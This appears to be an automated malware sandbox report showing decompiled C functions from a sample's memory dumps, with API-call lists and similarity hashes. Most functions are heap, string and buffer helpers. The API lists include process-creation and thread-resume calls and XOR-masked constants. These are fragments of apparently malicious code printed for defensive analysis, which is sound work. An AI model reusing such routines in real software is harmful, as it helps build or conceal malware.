                                                            • Opcode Fuzzy Hash: 14295a1fb0d3049bb849c58991e54a4b0fcba60db3cabfb74c84a3764258e3d7
                                                            • Instruction Fuzzy Hash: 17012D75901209FBDF209F96EC58DBEBFB8EBA4750F108067E904E2290D7718A40DB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E6E4B1741(void* __ecx) {
                                                            				void* _v8;
                                                            				char _v12;
                                                            				char* _t18;
                                                            				char* _t25;
                                                            				char* _t29;
                                                            
                                                            				_t22 = __ecx;
                                                            				_push(__ecx);
                                                            				_push(__ecx);
                                                            				_t25 = 0;
                                                            				if(E6E4B1344( &_v8,  &_v12,  *0x6e4b41cc ^ 0x13b675ce) != 0) {
                                                            					if(_v8 == 0) {
                                                            						_t29 = 0;
                                                            					} else {
                                                            						_t29 = E6E4B20BB(_t22, _v8,  *0x6e4b41cc ^ 0x64927f78);
                                                            					}
                                                            					if(_t29 != 0) {
                                                            						_v12 = E6E4B105E(_t22) & 0x0000ffff;
                                                            						_t18 = StrStrIA(_t29,  &_v12); // executed
                                                            						if(_t18 != 0) {
                                                            							_t25 = 0x657;
                                                            						}
                                                            					}
                                                            					HeapFree( *0x6e4b4190, 0, _v8);
                                                            				}
                                                            				return _t25;
                                                            			}
                                                            0x6e4b1741
                                                            0x6e4b1744
                                                            0x6e4b1745
                                                            0x6e4b175b
                                                            0x6e4b1764
                                                            0x6e4b1769
                                                            0x6e4b1782
                                                            0x6e4b176b
                                                            0x6e4b177e
                                                            0x6e4b177e
                                                            0x6e4b1786
                                                            0x6e4b1790
                                                            0x6e4b1798
                                                            0x6e4b17a0
                                                            0x6e4b17a2
                                                            0x6e4b17a2
                                                            0x6e4b17a0
                                                            0x6e4b17b2
                                                            0x6e4b17b2
                                                            0x6e4b17bd

                                                            APIs
                                                            • StrStrIA.KERNELBASE(00000000,6E4B1A94,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B1798
                                                            • HeapFree.KERNEL32(00000000,?,?,6E4B1A94,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B17B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: f0a70a19ec7978770c0a4d5ce7004342ac4d7172a843ec38103242bc648e4d7e
                                                            • Instruction ID: 62e7e75f9c0b97904113a6b894dbc30d3937bab183420b237e66fdad6f386308
                                                            • Opcode Fuzzy Hash: f0a70a19ec7978770c0a4d5ce7004342ac4d7172a843ec38103242bc648e4d7e
                                                            • Instruction Fuzzy Hash: B9018F76E10515BBDB009AF6DC44EEF77ADAF46641F100267E901E7344E631EA0687B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000001,00000000,73B74D40,?,?,00000000,045681E2), ref: 0457A4FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 17583365fe1741b87ee1136609480cb0e4d9ae70a562c29de2c5c18559cc11c5
                                                            • Instruction ID: 867e1bbf75ae88fdc47a995929b1d5e420c4f8961cfa7797725f5f369220723d
                                                            • Opcode Fuzzy Hash: 17583365fe1741b87ee1136609480cb0e4d9ae70a562c29de2c5c18559cc11c5
                                                            • Instruction Fuzzy Hash: 10313C72A00105EFDF11DF98E88199DB7B5FB44724F54806AE605AB210DA34BD45EB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E00DD76D4(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                                            				signed int _v5;
                                                            				signed int _v12;
                                                            				void* _t32;
                                                            				signed int _t37;
                                                            				signed int _t39;
                                                            				signed char _t45;
                                                            				void* _t49;
                                                            				char* _t51;
                                                            				signed int _t65;
                                                            				signed int _t66;
                                                            				signed int _t69;
                                                            
                                                            				_v12 = _v12 & 0x00000000;
                                                            				_t69 = __eax;
                                                            				_t32 = RtlAllocateHeap( *0xdda290, 0, __eax << 2); // executed
                                                            				_t49 = _t32;
                                                            				if(_t49 == 0) {
                                                            					_v12 = 8;
                                                            				} else {
                                                            					 *_a8 = _t49;
                                                            					do {
                                                            						_t45 =  *_a4;
                                                            						asm("cdq");
                                                            						_t65 = 0x64;
                                                            						_t37 = (_t45 & 0x000000ff) / _t65;
                                                            						_v5 = _t37;
                                                            						if(_t37 != 0) {
                                                            							 *_t49 = _t37 + 0x30;
                                                            							_t49 = _t49 + 1;
                                                            							_t45 = _t45 + _t37 * 0x9c;
                                                            						}
                                                            						asm("cdq");
                                                            						_t66 = 0xa;
                                                            						_t39 = (_t45 & 0x000000ff) / _t66;
                                                            						if(_t39 != 0 || _v5 != _t39) {
                                                            							 *_t49 = _t39 + 0x30;
                                                            							_t49 = _t49 + 1;
                                                            							_t45 = _t45 + _t39 * 0xf6;
                                                            						}
                                                            						_a4 = _a4 + 1;
                                                            						 *_t49 = _t45 + 0x30;
                                                            						 *(_t49 + 1) = 0x2c;
                                                            						_t49 = _t49 + 2;
                                                            						_t69 = _t69 - 1;
                                                            					} while (_t69 != 0);
                                                            					_t51 = _t49 - 1;
                                                            					 *_a12 = _t51 -  *_a8;
                                                            					 *_t51 = 0;
                                                            				}
                                                            				return _v12;
                                                            			}
                                                            0x00dd76d9
                                                            0x00dd76de
                                                            0x00dd76ec
                                                            0x00dd76f2
                                                            0x00dd76f6
                                                            0x00dd7767
                                                            0x00dd76f8
                                                            0x00dd76fc
                                                            0x00dd76ff
                                                            0x00dd7702
                                                            0x00dd7709
                                                            0x00dd770a
                                                            0x00dd770b
                                                            0x00dd770f
                                                            0x00dd7712
                                                            0x00dd7719
                                                            0x00dd771f
                                                            0x00dd7720
                                                            0x00dd7720
                                                            0x00dd7727
                                                            0x00dd7728
                                                            0x00dd7729
                                                            0x00dd772d
                                                            0x00dd7739
                                                            0x00dd773f
                                                            0x00dd7740
                                                            0x00dd7740
                                                            0x00dd7742
                                                            0x00dd7748
                                                            0x00dd774a
                                                            0x00dd774f
                                                            0x00dd7750
                                                            0x00dd7750
                                                            0x00dd7756
                                                            0x00dd775f
                                                            0x00dd7761
                                                            0x00dd7764
                                                            0x00dd7773

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00DD76EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ac44ffba4c0c357b6e341d4f3fc940cfad9e49df1d42451552a54c0285987c54
                                                            • Instruction ID: 2138f6aca71e998933389367a85d56428c3ab20dbaf8d46fc1bca12de4ef0c7e
                                                            • Opcode Fuzzy Hash: ac44ffba4c0c357b6e341d4f3fc940cfad9e49df1d42451552a54c0285987c54
                                                            • Instruction Fuzzy Hash: BC11B73524A344AFEB158F2DD851BE97B65EB53358F2850CBE4808B392C177890BC770
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(0457C493,0458B7A0,-0000000C,00000000,?,?,0457C495,0000000C,00000000,?), ref: 0456A081
                                                              • Part of subcall function 04570FA5: NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,0458C300), ref: 04570FBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleInformationModuleProcessQuery
                                                            • String ID:
                                                            • API String ID: 2776635927-0
                                                            • Opcode ID: f53bfef794450eda3d4b910a47a741cd0b9a277dcefa07ea5f3a5b2ef97e0538
                                                            • Instruction ID: 64f1bad4b2b0b758b781e3a4069af268fb869da320dcb02caf03a396fe3af94f
                                                            • Opcode Fuzzy Hash: f53bfef794450eda3d4b910a47a741cd0b9a277dcefa07ea5f3a5b2ef97e0538
                                                            • Instruction Fuzzy Hash: 3A219371200205AFEB20CF55D580A6A77E5FF463B47148429E946AB251DA31FD00FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0457180E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 19655df56c1050723f074fe9409249ae25f4117802e9a23e0cce39b35f10f172
                                                            • Instruction ID: d70bb071cabfae758f07fbab7f5f47deb8c61ea97f93fb22eedf11e7a7acf6f3
                                                            • Opcode Fuzzy Hash: 19655df56c1050723f074fe9409249ae25f4117802e9a23e0cce39b35f10f172
                                                            • Instruction Fuzzy Hash: 7C11083660011AAFDF119F99EC409DA7BA9FF48374B058139FD19A6260CB35EC21EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E00DD5D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                            				intOrPtr _v12;
                                                            				void* _v18;
                                                            				short _v20;
                                                            				intOrPtr _t15;
                                                            				short _t17;
                                                            				intOrPtr _t19;
                                                            				short _t23;
                                                            
                                                            				_t23 = 0;
                                                            				_v20 = 0;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosw");
                                                            				_t15 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t4 = _t15 + 0xddb394; // 0x39c893c
                                                            				_t20 = _t4;
                                                            				_t6 = _t15 + 0xddb124; // 0x650047
                                                            				_t17 = E00DD18B7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                            				if(_t17 < 0) {
                                                            					_t23 = _t17;
                                                            				} else {
                                                            					if(_v20 != 8) {
                                                            						_t23 = 1;
                                                            					} else {
                                                            						_t19 = E00DD1440(_t20, _v12);
                                                            						if(_t19 == 0) {
                                                            							_t23 = 8;
                                                            						} else {
                                                            							 *_a16 = _t19;
                                                            						}
                                                            						__imp__#6(_v12);
                                                            					}
                                                            				}
                                                            				return _t23;
                                                            			}
                                                            0x00dd5d27
                                                            0x00dd5d29
                                                            0x00dd5d30
                                                            0x00dd5d31
                                                            0x00dd5d32
                                                            0x00dd5d33
                                                            0x00dd5d39
                                                            0x00dd5d3e
                                                            0x00dd5d3e
                                                            0x00dd5d48
                                                            0x00dd5d5a
                                                            0x00dd5d61
                                                            0x00dd5d90
                                                            0x00dd5d63
                                                            0x00dd5d68
                                                            0x00dd5d8d
                                                            0x00dd5d6a
                                                            0x00dd5d6d
                                                            0x00dd5d74
                                                            0x00dd5d7f
                                                            0x00dd5d76
                                                            0x00dd5d79
                                                            0x00dd5d79
                                                            0x00dd5d83
                                                            0x00dd5d83
                                                            0x00dd5d68
                                                            0x00dd5d97

                                                            APIs
                                                              • Part of subcall function 00DD18B7: SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                              • Part of subcall function 00DD1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1449
                                                              • Part of subcall function 00DD1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DD3B57,004F0053,00000000,?), ref: 00DD1473
                                                              • Part of subcall function 00DD1440: memset.NTDLL ref: 00DD1487
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD5D83
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeString$lstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 397948122-0
                                                            • Opcode ID: b20db0bf75b57f49e2ef86d837319fdf8433c585b5a9d6ad0645961f5bb2e41b
                                                            • Instruction ID: 183681e0176510e78fcf98db9a628ee6cc57a6de36010824bce20db739403faa
                                                            • Opcode Fuzzy Hash: b20db0bf75b57f49e2ef86d837319fdf8433c585b5a9d6ad0645961f5bb2e41b
                                                            • Instruction Fuzzy Hash: 6201B131500529BFDF10AFA8EC09EAEBBB9FB05710F004867E941E2264E3719911DBF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E00DD6507(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                                            				char _v8;
                                                            				void* _t14;
                                                            				intOrPtr _t17;
                                                            				void* _t20;
                                                            				void* _t26;
                                                            
                                                            				_push(__ecx);
                                                            				if(_a4 == 0 || __eax == 0) {
                                                            					_t26 = 0x57;
                                                            				} else {
                                                            					_t14 = E00DD76D4(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                                            					_t26 = _t14;
                                                            					if(_t26 == 0) {
                                                            						_t17 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t9 = _t17 + 0xddb9e8; // 0x444f4340
                                                            						_t20 = E00DD4730( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                                            						_t26 = _t20;
                                                            						RtlFreeHeap( *0xdda290, 0, _a4); // executed
                                                            					}
                                                            				}
                                                            				return _t26;
                                                            			}

                                                            Instruction addresses for the decompiled lines above, in the order the report lists them: 0x00dd650a, 0x00dd6510, 0x00dd6567, 0x00dd6516, 0x00dd6521, 0x00dd6526, 0x00dd652a, 0x00dd6537, 0x00dd653f, 0x00dd654b, 0x00dd6553, 0x00dd655d, 0x00dd655d, 0x00dd652a, 0x00dd656c

                                                            APIs
                                                              • Part of subcall function 00DD76D4: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00DD76EC
                                                              • Part of subcall function 00DD4730: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00DD4764
                                                              • Part of subcall function 00DD4730: StrStrA.SHLWAPI(00000000,?), ref: 00DD4771
                                                              • Part of subcall function 00DD4730: RtlAllocateHeap.NTDLL(00000000,?), ref: 00DD4790
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00DD598B), ref: 00DD655D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Heap$Allocate$Freelstrlen
                                                            • String ID:
                                                            • API String ID: 2220322926-0
                                                            • Opcode ID: 450e0c8c349443dce6e132c63110729b4b4677ed68852c9bc13a82e82f4bc68a
                                                            • Instruction ID: c313b9ad06e07b209fc597f6dacd92a21763a81f5cb1d15b99de9d93c3e70920
                                                            • Opcode Fuzzy Hash: 450e0c8c349443dce6e132c63110729b4b4677ed68852c9bc13a82e82f4bc68a
                                                            • Instruction Fuzzy Hash: EB018176100208FFCB21CF88DC41EAA7BA9EB54350F144066FA45C6264E731EE44DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0456C5E7: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C606
                                                              • Part of subcall function 0456C5E7: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C611
                                                              • Part of subcall function 0456C5E7: _wcsupr.NTDLL ref: 0456C61E
                                                              • Part of subcall function 0456C5E7: lstrlenW.KERNEL32(00000000), ref: 0456C626
                                                            • ResumeThread.KERNEL32(00000004,?,0456D280,?), ref: 0456AD11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 3646851950-0
                                                            • Opcode ID: 1f951e6d05b70eb19365d52b0dc9a41702e0cb64e62fdd73153fb40166f63361
                                                            • Instruction ID: f148bc522cb6c7e650a089f4de93d809bd8a146fcdabda44b3a70df8741dbd11
                                                            • Opcode Fuzzy Hash: 1f951e6d05b70eb19365d52b0dc9a41702e0cb64e62fdd73153fb40166f63361
                                                            • Instruction Fuzzy Hash: C6D09E74244316B6E7322A119D05B1A7EA2BF56A99F10882CFAC7A20A1D7B5EC10F515
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0458466A
                                                              • Part of subcall function 0458477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04560000), ref: 045847F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                            • String ID:
                                                            • API String ID: 123106877-0
                                                            • Opcode ID: 6c8be1817cf164c54f5b3aed7e2a4312e79afdcb892432c008adab761d8b05f1
                                                            • Instruction ID: 3d87464b25eb262dfe55b69b60f3556271f02a963cfccd7bfa07fcabcc37e5f2
                                                            • Opcode Fuzzy Hash: 6c8be1817cf164c54f5b3aed7e2a4312e79afdcb892432c008adab761d8b05f1
                                                            • Instruction Fuzzy Hash: 49A001D63A9207BD331876626DA6D3B165CF4C2A263B0895EF905F4050BE803C46B835
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0458466A
                                                              • Part of subcall function 0458477A: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002858C,04560000), ref: 045847F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ExceptionHelper2@8LoadRaise___delay
                                                            • String ID:
                                                            • API String ID: 123106877-0
                                                            • Opcode ID: a912032931d9fb98046a1a0d8e9af1446db88e4e01d95a20accde1371252fa48
                                                            • Instruction ID: 16b8e7f77c5d0aacaa19d0bae955f6362a402ba15df5293fe93258712c5b6239
                                                            • Opcode Fuzzy Hash: a912032931d9fb98046a1a0d8e9af1446db88e4e01d95a20accde1371252fa48
                                                            • Instruction Fuzzy Hash: 4EA001D63A9207FD331876626DA6D3B165CF4C6A663B0895EE906E4050BE803C46B831
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4772afd52fc24a7cf1edb459fe503ff38f1a5fdfdc1d4e3c353dbcbf1da7e05c
                                                            • Instruction ID: 81a7c969c69c761f7034bf996da8ca713eed7cf5ced2e5dd2f769873e17adfd3
                                                            • Opcode Fuzzy Hash: 4772afd52fc24a7cf1edb459fe503ff38f1a5fdfdc1d4e3c353dbcbf1da7e05c
                                                            • Instruction Fuzzy Hash: 64B01231000100EBCB114B00DD04F097B21F750700F015418F204640A18E399C68FF08
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD77D7(long _a4) {
                                                            				void* _t2;
                                                            
                                                            				_t2 = RtlAllocateHeap( *0xdda290, 0, _a4); // executed
                                                            				return _t2;
                                                            			}

                                                            Instruction addresses for the decompiled lines above, in the order the report lists them: 0x00dd77e3, 0x00dd77e9

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: c58293b9f701e63140596f7cc3610e3f6c5e1a80a40fe52e4dae5c972928623c
                                                            • Instruction ID: 5408ac18feec17026f80fce4a30f52d4ca4a1293ace810b0ef09b59765d69d44
                                                            • Opcode Fuzzy Hash: c58293b9f701e63140596f7cc3610e3f6c5e1a80a40fe52e4dae5c972928623c
                                                            • Instruction Fuzzy Hash: A8B01235056300ABCA124B00ED04F05BF32B750B00F10C012B2048017082330420EB29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD77EC(void* _a4) {
                                                            				char _t2;
                                                            
                                                            				_t2 = RtlFreeHeap( *0xdda290, 0, _a4); // executed
                                                            				return _t2;
                                                            			}

                                                            Instruction addresses for the decompiled lines above, in the order the report lists them: 0x00dd77f8, 0x00dd77fe

                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 84bd9b46c0d00f65f3c2dbd512eba5b91260897957e5d3b53918dab85516815b
                                                            • Instruction ID: 70089964a87d83c0c01651275cde10d7c31aa793074d880cf4368fa9844ae03e
                                                            • Opcode Fuzzy Hash: 84bd9b46c0d00f65f3c2dbd512eba5b91260897957e5d3b53918dab85516815b
                                                            • Instruction Fuzzy Hash: EDB01275145300ABCB124B01EE04F05BF22B750B00F008012B308D017882330420FB3A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD3612(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				char _v32;
                                                            				char _v144;
                                                            				int _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				char _v164;
                                                            				void* _t37;
                                                            				void* _t42;
                                                            				void* _t51;
                                                            				int _t53;
                                                            				void* _t60;
                                                            				void* _t63;
                                                            				void* _t64;
                                                            
                                                            				_t53 = 0;
                                                            				_t60 = __ecx;
                                                            				_v16 = 0;
                                                            				_v12 = 0;
                                                            				_v8 = 0;
                                                            				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                                            					L21:
                                                            					return _t53;
                                                            				} else {
                                                            					_t58 =  &_v164;
                                                            					_t37 = E00DD17FA(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                                            					if(_t37 != 0) {
                                                            						goto L21;
                                                            					}
                                                            					_t61 = _t60 - 0x80;
                                                            					if(_v148 > _t60 - 0x80) {
                                                            						goto L21;
                                                            					}
                                                            					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                                            						_t37 = _t37 + 1;
                                                            						if(_t37 < 0x10) {
                                                            							continue;
                                                            						}
                                                            						_t53 = _v148;
                                                            						_t51 = E00DD77D7(_t53);
                                                            						_t73 = _t51;
                                                            						_v8 = _t51;
                                                            						if(_t51 != 0) {
                                                            							_t53 = 0;
                                                            							L18:
                                                            							if(_t53 != 0) {
                                                            								goto L21;
                                                            							}
                                                            							L19:
                                                            							if(_v8 != 0) {
                                                            								E00DD77EC(_v8);
                                                            							}
                                                            							goto L21;
                                                            						}
                                                            						memcpy(_t51, _a4, _t53);
                                                            						L8:
                                                            						_t63 = _v8;
                                                            						E00DD2525(_t58, _t73, _t63, _t53,  &_v32);
                                                            						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                                            							L15:
                                                            							_t53 = 0;
                                                            							goto L19;
                                                            						} else {
                                                            							 *_a8 = _t63;
                                                            							goto L18;
                                                            						}
                                                            					}
                                                            					_t58 =  &_v144;
                                                            					_t42 = E00DD3FAB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                                            					__eflags = _t42;
                                                            					if(_t42 != 0) {
                                                            						_t53 = _v12;
                                                            						goto L18;
                                                            					}
                                                            					_t53 = _v148;
                                                            					__eflags = _v12 - _t53;
                                                            					if(__eflags >= 0) {
                                                            						goto L8;
                                                            					}
                                                            					goto L15;
                                                            				}
                                                            			}

                                                            Instruction addresses for the decompiled lines above, in the order the report lists them (0x00000000 where a line carries no instruction, such as a label or goto): 0x00dd361d, 0x00dd3620, 0x00dd3629, 0x00dd362c, 0x00dd362f, 0x00dd3632, 0x00dd372e, 0x00dd3732, 0x00dd3644, 0x00dd3650, 0x00dd3657, 0x00dd365e, 0x00000000, 0x00000000, 0x00dd3664, 0x00dd366c, 0x00000000, 0x00000000, 0x00dd3672, 0x00dd367b, 0x00dd367f, 0x00000000, 0x00000000, 0x00dd3681, 0x00dd3688, 0x00dd368d, 0x00dd368f, 0x00dd3692, 0x00dd3713, 0x00dd371a, 0x00dd371c, 0x00000000, 0x00000000, 0x00dd371e, 0x00dd3722, 0x00dd3727, 0x00dd3727, 0x00000000, 0x00dd3722, 0x00dd3699, 0x00dd36a1, 0x00dd36a1, 0x00dd36aa, 0x00dd36b8, 0x00dd370f, 0x00dd370f, 0x00000000, 0x00dd36db, 0x00dd36de, 0x00000000, 0x00dd36de, 0x00dd36b8, 0x00dd36ed, 0x00dd36fb, 0x00dd3700, 0x00dd3702, 0x00dd3717, 0x00000000, 0x00dd3717, 0x00dd3704, 0x00dd370a, 0x00dd370d, 0x00000000, 0x00000000, 0x00000000, 0x00dd370d

                                                            APIs
                                                            • memcpy.NTDLL(00000000,?,?,?,?,00DD6E08,?,00DD6E08,?,00DD6E08), ref: 00DD3699
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            • Opcode ID: de29d870a994540890709b5c818db95062e9abfadc975bae42559ab9d213e7ed
                                                            • Instruction ID: 0416ff4bd75e62613c3f84a15f5fb30b70022764ff2bd431276572ab37135770
                                                            • Opcode Fuzzy Hash: de29d870a994540890709b5c818db95062e9abfadc975bae42559ab9d213e7ed
